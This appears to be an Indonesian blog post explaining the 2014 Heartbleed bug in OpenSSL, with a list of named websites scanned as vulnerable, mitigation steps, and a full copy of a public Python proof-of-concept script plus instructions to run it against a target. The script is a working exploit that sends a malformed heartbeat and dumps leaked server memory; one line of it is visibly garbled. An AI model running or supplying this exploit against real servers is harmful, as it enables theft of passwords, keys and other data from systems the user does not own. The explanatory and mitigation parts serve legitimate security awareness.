Heartbleed bug OpenSSL


Selamat hari Sabtu bro 🙂 Oh iya kali ini akan membahas tentang HeartBleed yang lagi hot-hot nya di dunia maya,

Apa itu HeartBleed? Heartbleed bug merupakan sebuah kerentanan dalam enkripsi protokol Internet bernama OpenSSL.

Apa itu OpenSSL? OpenSSL merupakan salah satu metode enkripsi data yang digunakan oleh banyak website yang berguna untuk melindungi kerahasiaan data yang anda ketikkan atau masukkan pada Web browser anda.

Dalam OpenSSL, terdapat sebuah fungsi yang dikenal dengan “Hearbeat Option”, atau secara umum berarti opsi detak jantung.

Apakah Heartbeat Option itu? Pada saat anda mengunjungi sebuah website yang menggunakan OpenSSL, komputer orang tersebut secara rutin/berkala mengirimkan data dan menerima data untuk mengecek apakah baik komputer pengguna tersebut dengan server website yang dia kunjungi masih terhubung atau tidak. Aliran data/pesan tadi diibaratkan sebagai detak jantung, sinyal yang datang dan pergi antara kedua komputer tersebut terjadi dengan ritme tertentu. Di sinilah letak Heartbleed bug.

Heartbleed bug memungkinkan hacker untuk mengirimkan sinyal pesan palsu, yang tentu dapat menipu server untuk mengirimkan data yang tersimpan dalam RAM-nya. Data tersebut bisa berupa informasi sensitif tentang daftar username, password, nomor kartu kredit, daftar email, dan lainnya.   ini List situs yang terkena dampak, termaksud forum terbesar di indonesia, kaskus.co.id

Disclaimer: This scan was performed around April 8, 12:00 UTC. Websites listed
as vulnerable may no longer be vulnerable. This list serves as a snapshot of
vulnerable sites at the time of the scan.

To check if a site is still vulnerable, you may use the tool at:
http://filippo.io/Heartbleed/

-

Testing yahoo.com... vulnerable.
Testing imgur.com... vulnerable.
Testing stackoverflow.com... vulnerable.
Testing kickass.to... vulnerable.
Testing flickr.com... vulnerable.
Testing redtube.com... vulnerable.
Testing sogou.com... vulnerable.
Testing adf.ly... vulnerable.
Testing outbrain.com... vulnerable.
Testing archive.org... vulnerable.
Testing addthis.com... vulnerable.
Testing stackexchange.com... vulnerable.
Testing popads.net... vulnerable.
Testing avito.ru... vulnerable.
Testing kaskus.co.id... vulnerable.
Testing web.de... vulnerable.
Testing suning.com... vulnerable.
Testing zeobit.com... vulnerable.
Testing beeg.com... vulnerable.
Testing seznam.cz... vulnerable.
Testing okcupid.com... vulnerable.
Testing pch.com... vulnerable.
Testing xda-developers.com... vulnerable.
Testing steamcommunity.com... vulnerable.
Testing slate.com... vulnerable.
Testing scoop.it... vulnerable.
Testing hidemyass.com... vulnerable.
Testing 123rf.com... vulnerable.
Testing m-w.com... vulnerable.
Testing dreamstime.com... vulnerable.
Testing amung.us... vulnerable.
Testing duckduckgo.com... vulnerable.
Testing leo.org... vulnerable.
Testing eventbrite.com... vulnerable.
Testing wetransfer.com... vulnerable.
Testing sh.st... vulnerable.
Testing entrepreneur.com... vulnerable.
Testing zoho.com... vulnerable.
Testing yts.re... vulnerable.
Testing usmagazine.com... vulnerable.
Testing fool.com... vulnerable.
Testing digitalpoint.com... vulnerable.
Testing picmonkey.com... vulnerable.
Testing petflow.com... vulnerable.
Testing squidoo.com... vulnerable.
Testing avazutracking.net... vulnerable.
Testing elegantthemes.com... vulnerable.
Testing 500px.com... vulnerable.

Iya langgsung saja, ini salah satu sc untuk testing bug tersebut (saya mencoba menjalankanya di linux,OS X). berformat pyhton .py

#!/usr/bin/python
 
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
 
import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser
 
options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
 
def h2bin(x):
    return x.replace(' ', '').replace('
', '').decode('hex')
 
hello = h2bin('''
16 03 02 00  dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
00 0f 00 01 01                                  
''')
 
hb = h2bin(''' 
18 03 02 00 03
01 40 00
''')
 
def hexdump(s):
    for b in xrange(0, len(s), 16):
        lin = [c 1="c" 2="in" 3="s[b" 4=":" 5="b" 6="+" 7="16" language="for"][/c]]
        hxdat = ' '.join('%02X' % ord(c) for c in lin)
        pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
        print '  %04x: %-48s %s' % (b, hxdat, pdat)
    print
 
def recvall(s, length, timeout=5):
    endtime = time.time() + timeout
    rdata = ''
    remain = length
    while remain > 0:
        rtime = endtime - time.time() 
        if rtime < 0:
            return None
        r, w, e = select.select([s], [], [], 5)
        if s in r:
            data = s.recv(remain)
            # EOF?
            if not data:
                return None
            rdata += data
            remain -= len(data)
    return rdata
         
 
def recvmsg(s):
    hdr = recvall(s, 5)
    if hdr is None:
        print 'Unexpected EOF receiving record header - server closed connection'
        return None, None, None
    typ, ver, ln = struct.unpack('>BHH', hdr)
    pay = recvall(s, ln, 10)
    if pay is None:
        print 'Unexpected EOF receiving record payload - server closed connection'
        return None, None, None
    print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
    return typ, ver, pay
 
def hit_hb(s):
    s.send(hb)
    while True:
        typ, ver, pay = recvmsg(s)
        if typ is None:
            print 'No heartbeat response received, server likely not vulnerable'
            return False
 
        if typ == 24:
            print 'Received heartbeat response:'
            hexdump(pay)
            if len(pay) > 3:
                print 'WARNING: server returned more data than it should - server is vulnerable!'
            else:
                print 'Server processed malformed heartbeat, but did not return any extra data.'
            return True
 
        if typ == 21:
            print 'Received alert:'
            hexdump(pay)
            print 'Server returned error, likely not vulnerable'
            return False
 
def main():
    opts, args = options.parse_args()
    if len(args) < 1:
        options.print_help()
        return
 
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print 'Connecting...'
    sys.stdout.flush()
    s.connect((args[0], opts.port))
    print 'Sending Client Hello...'
    sys.stdout.flush()
    s.send(hello)
    print 'Waiting for Server Hello...'
    sys.stdout.flush()
    while True:
        typ, ver, pay = recvmsg(s)
        if typ == None:
            print 'Server closed connection without sending Server Hello.'
            return
        # Look for server hello done message.
        if typ == 22 and ord(pay[0]) == 0x0E:
            break
 
    print 'Sending heartbeat request...'
    sys.stdout.flush()
    s.send(hb)
    hit_hb(s)
 
if __name__ == '__main__':
    main()

Cara menjalankanya, buat file bernama heartbeat.py  (nama bebas) dan masukan sc di atas. jangan lupa ketik perintah :

chmod +x heartbeat.py
./heartbeat.py (target)

Jika target VULNERABLE pasti nanti keluar hasilnya, contoh seperti ini

oke cukup mudah kan bro, mungkin beberapa website ternama sudah pada mengupdate OpenSSL mereka, oh iya cara untuk  menghindari bug OpenSSL ini ada beberapa teknik :  

  • Inventory all systems and servers running OpenSSL 1.0.1 and newer
  • Upgrade to OpenSSL 1.0.1g or recompile with -DOPENSSL_NO_HEARTBEATS
  • Revoke compromised keys and reissue new keys from the Certificate Authority
  • Change user passwords and encryption keys
  • All session keys and session cookies must be expired/invalidated
  • All users of systems where SSL is in use must be informed of the potential for compromise
  • Consider implementing perfect forward secrecy to protect against current and future attack

  Semoga Bermanfaat bro 🙂

Fahmi

We’re still Pioneers, We Barely Begun. Our Greatest Accomplishments cannot be behind us, cause our destiny lies above us.

Leave a Reply